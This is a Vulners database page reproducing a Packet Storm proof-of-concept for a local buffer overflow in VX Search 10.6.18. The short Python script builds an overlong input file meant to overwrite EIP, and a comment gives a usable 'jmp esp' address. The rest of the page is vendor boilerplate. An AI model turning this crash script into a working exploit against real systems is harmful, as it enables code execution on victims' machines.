Lucene search
K

VX Search 10.6.18 Local Buffer Overflow

🗓️ 18 Apr 2018 00:00:00Reported by Kevin McGuiganType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

VX Search 10.6.18 Local Buffer Overflow Python Scrip

Code
`#!/usr/bin/python  
# Title: VX Search 10.6.18 Local Buffer Overflow  
# Author: Kevin McGuigan  
# Twitter: @_h3xagram  
# Author Website: https://www.7elements.co.uk  
# Vendor Website: http://www.vxsearch.com  
# Version: 10.6.18  
# Date: 18/04/2018  
# Tested on: Windows 7 32-bit  
# Vendor did not respond to advisory.   
  
# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field.   
  
filename="vxsearchPOC.txt"  
junk = "A"*271  
#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)  
#eip="\x1a\x2a\x2c\x65"  
eip = "B" * 4  
fill = "C" *900  
buffer = junk + eip + fill  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation